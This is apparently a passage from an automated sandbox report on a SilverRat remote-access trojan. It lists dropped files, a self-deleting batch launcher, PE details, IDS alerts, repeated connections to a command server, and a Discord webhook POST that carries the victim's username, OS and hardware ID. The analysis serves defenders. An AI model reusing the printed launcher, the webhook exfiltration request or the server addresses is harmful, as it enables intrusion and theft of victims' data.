                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yr2f3e4u.15d.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\tmp9C90.tmp.bat

                                                      Download File
                                                      Process:C:\Users\user\Desktop\YDW0S5K7hi.exe
                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):202
                                                      Entropy (8bit):5.154561466644995
                                                      Encrypted:false
                                                      SSDEEP:6:hWKqTtT6cNwiaZ5SuH1mQdJ70Gvmq1cNwi23fTXBSk:wdtTsNHSuVzH0G+iZLX/
                                                      MD5:AD74140DF773B21B222835AB9DB1C643
                                                      SHA1:65C544AA7C8A647262544FBFC630E2B1B09062DB
                                                      SHA-256:7A09E723939D1AE14A121061E0711D3864CB069B64D9BAEE6707C119DF656A4E
                                                      SHA-512:481295D97E41F7C6AA6837FBC25E122B481BDC9698BFB186DA6EE0F2834FAD1904EB3C9C60C08D9A6F4C25437CE05CD594A90E9CA649EC9CF28EE22AD8036F83
                                                      Malicious:false
                                                      Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp9C90.tmp.bat" /f /q..

                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\YDW0S5K7hi.exe
                                                      File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):46080
                                                      Entropy (8bit):5.5455244016017495
                                                      Encrypted:false
                                                      SSDEEP:768:yWfoI5XPDHzT8d7tGx0cTIIW/pNCypKbmRUT0d9S5QynqjB6SQne6vrR/HNh:yWRk7tGPs1DCypKCGAd9Uqjoxe6F/HNh
                                                      MD5:FE4EE341B4E7E0D03E27893BD6070A3E
                                                      SHA1:078F2F65179647C8A6AF688BE140138EAE827E1F
                                                      SHA-256:FD32B776EDD0656AD550B2A4981897515F5F2C793EB3D80DA8FCD04F98B12222
                                                      SHA-512:FA0B4D10DB62E06C782B09B2BD40974EC990EBF02D8A8E8F5E0932CC6CC2E91071129392A9FEB57A4F33868D25F31901A2F884E54821451BA9C8D70AE420DA7C
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 61%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....3g.........."...................... .....@..... ....................................@...@......@............... ............................................................................................................................... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..BH........[...n...................................................................(r...*..0............+. ....(......X...(....2.(....-..(....(....-..(....+. ....(......&..(....,.($...(....(....s......r...po.....r...pr...p(....o....o......o......o.....(....&..&..(W...(......&..~....-........s.........~....s....(......&..(C...-.(N...(K.....&..~....(....(....+...@....7..C........\.B.........(.............).....................(....*.0..........(....~....(....o.........~....(....s........

                                                      \Device\Null

                                                      Download File
                                                      Process:C:\Windows\System32\timeout.exe
                                                      File Type:ASCII text, with CRLF line terminators, with overstriking
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.41440934524794
                                                      Encrypted:false
                                                      SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                      MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                      SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                      SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                      SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                      Malicious:false
                                                      Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..

                                                      Static File Info

                                                      General

                                                      File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):5.5455244016017495
                                                      TrID:
                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                      • DOS Executable Generic (2002/1) 0.92%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:YDW0S5K7hi.exe
                                                      File size:46'080 bytes
                                                      MD5:fe4ee341b4e7e0d03e27893bd6070a3e
                                                      SHA1:078f2f65179647c8a6af688be140138eae827e1f
                                                      SHA256:fd32b776edd0656ad550b2a4981897515f5f2c793eb3d80da8fcd04f98b12222
                                                      SHA512:fa0b4d10db62e06c782b09b2bd40974ec990ebf02d8a8e8f5e0932cc6cc2e91071129392a9feb57a4f33868d25f31901a2f884e54821451ba9c8d70ae420da7c
                                                      SSDEEP:768:yWfoI5XPDHzT8d7tGx0cTIIW/pNCypKbmRUT0d9S5QynqjB6SQne6vrR/HNh:yWRk7tGPs1DCypKCGAd9Uqjoxe6F/HNh
                                                      TLSH:E0235C007BDC8279E7BE1B7C99F1022646B9F1631512E78E4CC841EA1D277C98B85BF6
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....3g.........."...................... .....@..... ....................................@...@......@............... .....

                                                      File Icon

                                                      Icon Hash:00928e8e8686b000

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x140000000
                                                      Entrypoint Section:
                                                      Digitally signed:false
                                                      Imagebase:0x140000000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x6733D1DC [Tue Nov 12 22:08:28 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:

                                                      Entrypoint Preview

                                                      Instruction
                                                      dec ebp
                                                      pop edx
                                                      nop
                                                      add byte ptr [ebx], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax+eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xe0000x4d0.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000xaa440xac00c2b14b283ee3cec7ebaae6c8cb1256b8False0.5033157703488372data5.6120712775063835IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0xe0000x4d00x6006b0f67afb8070f92423b8e34f11082c3False0.3723958333333333data3.6947970197850175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_VERSION0xe0a00x23cdata0.46853146853146854
                                                      RT_MANIFEST0xe2e00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-11-13T21:11:36.230576+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.749781TCP
                                                      2024-11-13T21:12:14.628423+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.749981TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 13, 2024 21:11:30.612484932 CET49760443192.168.2.7162.159.137.232
                                                      Nov 13, 2024 21:11:30.612514019 CET44349760162.159.137.232192.168.2.7
                                                      Nov 13, 2024 21:11:30.612705946 CET49760443192.168.2.7162.159.137.232
                                                      Nov 13, 2024 21:11:30.667495012 CET49760443192.168.2.7162.159.137.232
                                                      Nov 13, 2024 21:11:30.667515993 CET44349760162.159.137.232192.168.2.7
                                                      Nov 13, 2024 21:11:31.287319899 CET44349760162.159.137.232192.168.2.7
                                                      Nov 13, 2024 21:11:31.287388086 CET49760443192.168.2.7162.159.137.232
                                                      Nov 13, 2024 21:11:31.290194035 CET49760443192.168.2.7162.159.137.232
                                                      Nov 13, 2024 21:11:31.290206909 CET44349760162.159.137.232192.168.2.7
                                                      Nov 13, 2024 21:11:31.290724993 CET44349760162.159.137.232192.168.2.7
                                                      Nov 13, 2024 21:11:31.341644049 CET49760443192.168.2.7162.159.137.232
                                                      Nov 13, 2024 21:11:31.389662027 CET49760443192.168.2.7162.159.137.232
                                                      Nov 13, 2024 21:11:31.435323954 CET44349760162.159.137.232192.168.2.7
                                                      Nov 13, 2024 21:11:31.515441895 CET44349760162.159.137.232192.168.2.7
                                                      Nov 13, 2024 21:11:31.516283035 CET49760443192.168.2.7162.159.137.232
                                                      Nov 13, 2024 21:11:31.516295910 CET44349760162.159.137.232192.168.2.7
                                                      Nov 13, 2024 21:11:31.707830906 CET44349760162.159.137.232192.168.2.7
                                                      Nov 13, 2024 21:11:31.708036900 CET44349760162.159.137.232192.168.2.7
                                                      Nov 13, 2024 21:11:31.708168983 CET49760443192.168.2.7162.159.137.232
                                                      Nov 13, 2024 21:11:31.714342117 CET49760443192.168.2.7162.159.137.232
                                                      Nov 13, 2024 21:11:31.728205919 CET497669999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:11:31.733253956 CET999949766109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:11:31.733429909 CET497669999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:11:31.735274076 CET497669999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:11:31.740340948 CET999949766109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:11:40.214565039 CET999949766109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:11:40.214663982 CET497669999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:11:40.235089064 CET497669999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:11:40.235690117 CET498199999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:11:40.239959002 CET999949766109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:11:40.240519047 CET999949819109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:11:40.240605116 CET498199999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:11:40.241020918 CET498199999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:11:40.246114969 CET999949819109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:11:48.741476059 CET999949819109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:11:48.741578102 CET498199999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:11:48.748178959 CET498199999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:11:48.748667002 CET498659999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:11:48.753299952 CET999949819109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:11:48.753787041 CET999949865109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:11:48.753873110 CET498659999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:11:48.754117966 CET498659999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:11:48.759151936 CET999949865109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:11:57.241067886 CET999949865109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:11:57.241163015 CET498659999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:11:57.248071909 CET498659999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:11:57.248522997 CET499129999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:11:57.253046989 CET999949865109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:11:57.253345013 CET999949912109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:11:57.253427982 CET499129999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:11:57.253709078 CET499129999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:11:57.258537054 CET999949912109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:05.744754076 CET999949912109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:05.744843006 CET499129999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:05.763814926 CET499129999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:05.764235020 CET499549999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:05.768949986 CET999949912109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:05.769201994 CET999949954109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:05.769277096 CET499549999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:05.769623041 CET499549999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:05.774615049 CET999949954109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:14.258771896 CET999949954109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:14.258845091 CET499549999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:14.263788939 CET499549999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:14.264179945 CET499829999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:14.268737078 CET999949954109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:14.269074917 CET999949982109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:14.269154072 CET499829999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:14.269378901 CET499829999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:14.274426937 CET999949982109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:22.760365963 CET999949982109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:22.760471106 CET499829999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:22.779521942 CET499829999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:22.779989004 CET499839999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:22.784322023 CET999949982109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:22.784848928 CET999949983109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:22.784929991 CET499839999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:22.785283089 CET499839999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:22.790075064 CET999949983109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:31.267810106 CET999949983109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:31.267914057 CET499839999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:31.279851913 CET499839999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:31.280251026 CET499849999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:31.284796000 CET999949983109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:31.285656929 CET999949984109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:31.285742044 CET499849999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:31.286036968 CET499849999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:31.291150093 CET999949984109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:39.772269011 CET999949984109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:39.772365093 CET499849999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:39.779738903 CET499849999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:39.780905008 CET499859999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:39.784636974 CET999949984109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:39.785845041 CET999949985109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:39.785938978 CET499859999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:39.786310911 CET499859999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:39.791127920 CET999949985109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:48.268131018 CET999949985109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:48.269033909 CET499859999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:48.280478954 CET499859999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:48.282788038 CET499869999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:48.285327911 CET999949985109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:48.287703037 CET999949986109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:48.287837029 CET499869999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:48.288361073 CET499869999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:48.293163061 CET999949986109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:56.762806892 CET999949986109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:56.763035059 CET499869999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:56.779838085 CET499869999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:56.780327082 CET499879999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:56.784811974 CET999949986109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:56.785186052 CET999949987109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:12:56.785293102 CET499879999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:56.785557032 CET499879999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:12:56.790642023 CET999949987109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:13:05.274651051 CET999949987109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:13:05.274781942 CET499879999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:13:05.282526970 CET499879999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:13:05.282999039 CET499889999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:13:05.287688017 CET999949987109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:13:05.288184881 CET999949988109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:13:05.288304090 CET499889999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:13:05.288748980 CET499889999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:13:05.293982029 CET999949988109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:13:13.771655083 CET999949988109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:13:13.771848917 CET499889999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:13:13.779870987 CET499889999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:13:13.780409098 CET499899999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:13:13.784631968 CET999949988109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:13:13.785381079 CET999949989109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:13:13.785455942 CET499899999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:13:13.785768986 CET499899999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:13:13.790600061 CET999949989109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:13:22.265855074 CET999949989109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:13:22.265976906 CET499899999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:13:22.295525074 CET499899999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:13:22.295936108 CET499909999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:13:22.306687117 CET999949989109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:13:22.306763887 CET999949990109.120.138.54192.168.2.7
                                                      Nov 13, 2024 21:13:22.306839943 CET499909999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:13:22.307171106 CET499909999192.168.2.7109.120.138.54
                                                      Nov 13, 2024 21:13:22.313875914 CET999949990109.120.138.54192.168.2.7

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 13, 2024 21:11:14.865227938 CET6294953192.168.2.71.1.1.1
                                                      Nov 13, 2024 21:11:30.560632944 CET5644253192.168.2.71.1.1.1
                                                      Nov 13, 2024 21:11:30.568001986 CET53564421.1.1.1192.168.2.7

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Nov 13, 2024 21:11:14.865227938 CET192.168.2.71.1.1.10x1addStandard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                      Nov 13, 2024 21:11:30.560632944 CET192.168.2.71.1.1.10x47e4Standard query (0)discord.comA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Nov 13, 2024 21:11:14.872944117 CET1.1.1.1192.168.2.70x1addNo error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                      Nov 13, 2024 21:11:17.000811100 CET1.1.1.1192.168.2.70x3236No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                      Nov 13, 2024 21:11:17.000811100 CET1.1.1.1192.168.2.70x3236No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                      Nov 13, 2024 21:11:30.568001986 CET1.1.1.1192.168.2.70x47e4No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                      Nov 13, 2024 21:11:30.568001986 CET1.1.1.1192.168.2.70x47e4No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                      Nov 13, 2024 21:11:30.568001986 CET1.1.1.1192.168.2.70x47e4No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                      Nov 13, 2024 21:11:30.568001986 CET1.1.1.1192.168.2.70x47e4No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                      Nov 13, 2024 21:11:30.568001986 CET1.1.1.1192.168.2.70x47e4No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • discord.com

                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.749760162.159.137.2324437992C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-11-13 20:11:31 UTC255OUTPOST /api/webhooks/1306009594367180840/Zg6W2rH_yPNkl7Hn5Z-GWjtm8W94xN_PzceHo8g5RjjoNr4vkRdq1c70arvb91az-VPT HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: discord.com
                                                      Content-Length: 414
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      2024-11-13 20:11:31 UTC25INHTTP/1.1 100 Continue
                                                      2024-11-13 20:11:31 UTC414OUTData Raw: 75 73 65 72 6e 61 6d 65 3d 48 65 79 2b 41 44 4d 49 4e 26 61 76 61 74 61 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 67 2e 74 6f 70 34 74 6f 70 2e 69 6f 25 32 66 70 5f 32 35 32 32 63 37 77 38 75 31 2e 70 6e 67 26 63 6f 6e 74 65 6e 74 3d 59 6f 75 2b 68 61 76 65 2b 61 2b 63 6c 69 65 6e 74 2b 6f 6e 6c 69 6e 65 2b 6e 6f 77 2b 25 37 62 2b 4e 65 77 2b 25 37 64 25 30 61 2b 2b 25 65 32 25 39 63 25 38 35 2b 55 73 65 72 6e 61 6d 65 2b 25 33 61 2b 66 72 6f 6e 74 64 65 73 6b 25 34 30 33 37 36 34 38 33 25 30 61 2b 2b 25 65 32 25 39 63 25 38 35 2b 53 79 73 74 65 6d 2b 25 33 61 2b 4d 69 63 72 6f 73 6f 66 74 2b 57 69 6e 64 6f 77 73 2b 31 30 2b 50 72 6f 25 30 61 2b 2b 25 65 32 25 39 63 25 38 35 2b 48 57 49 44 2b 25 33 61 2b 41 32 31 33 31 33 46 32 35 33 42
                                                      Data Ascii: username=Hey+ADMIN&avatar_url=https%3a%2f%2fg.top4top.io%2fp_2522c7w8u1.png&content=You+have+a+client+online+now+%7b+New+%7d%0a++%e2%9c%85+Username+%3a+user%40376483%0a++%e2%9c%85+System+%3a+Microsoft+Windows+10+Pro%0a++%e2%9c%85+HWID+%3a+A21313F253B
                                                      2024-11-13 20:11:31 UTC1296INHTTP/1.1 404 Not Found
                                                      Date: Wed, 13 Nov 2024 20:11:31 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 45
                                                      Connection: close
                                                      Cache-Control: public, max-age=3600, s-maxage=3600
                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                      x-ratelimit-limit: 5
                                                      x-ratelimit-remaining: 4
                                                      x-ratelimit-reset: 1731528693
                                                      x-ratelimit-reset-after: 1
                                                      via: 1.1 google
                                                      alt-svc: h3=":443"; ma=86400
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qW73MYqKH3Z90xhdPmQ0gadTnrC5LwF78B4rIcEsGOBbKbFt5FAb7TF5TB%2BsfAtRkkv1IVWKnXI3t893J9JuotwNXlvOJgP4slxxcpgwFU6R9JN9Q78YJOhN3NrE"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      X-Content-Type-Options: nosniff
                                                      Set-Cookie: __cfruid=4dda201f464c81e917efe784742ecb12015cec99-1731528691; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                      Set-Cookie: _cfuvid=27Y0rH0vNJF3OpOz3GsOUjHcHWN1QbZUj3jzzy7z4Gc-1731528691632-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                      Server: cloudflare
                                                      CF-RAY: 8e2169518d364630-DFW
                                                      {"message": "Unknown Webhook", "code": 10015}


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:15:11:18
                                                      Start date:13/11/2024
                                                      Path:C:\Users\user\Desktop\YDW0S5K7hi.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\YDW0S5K7hi.exe"
                                                      Imagebase:0x4b0000
                                                      File size:46'080 bytes
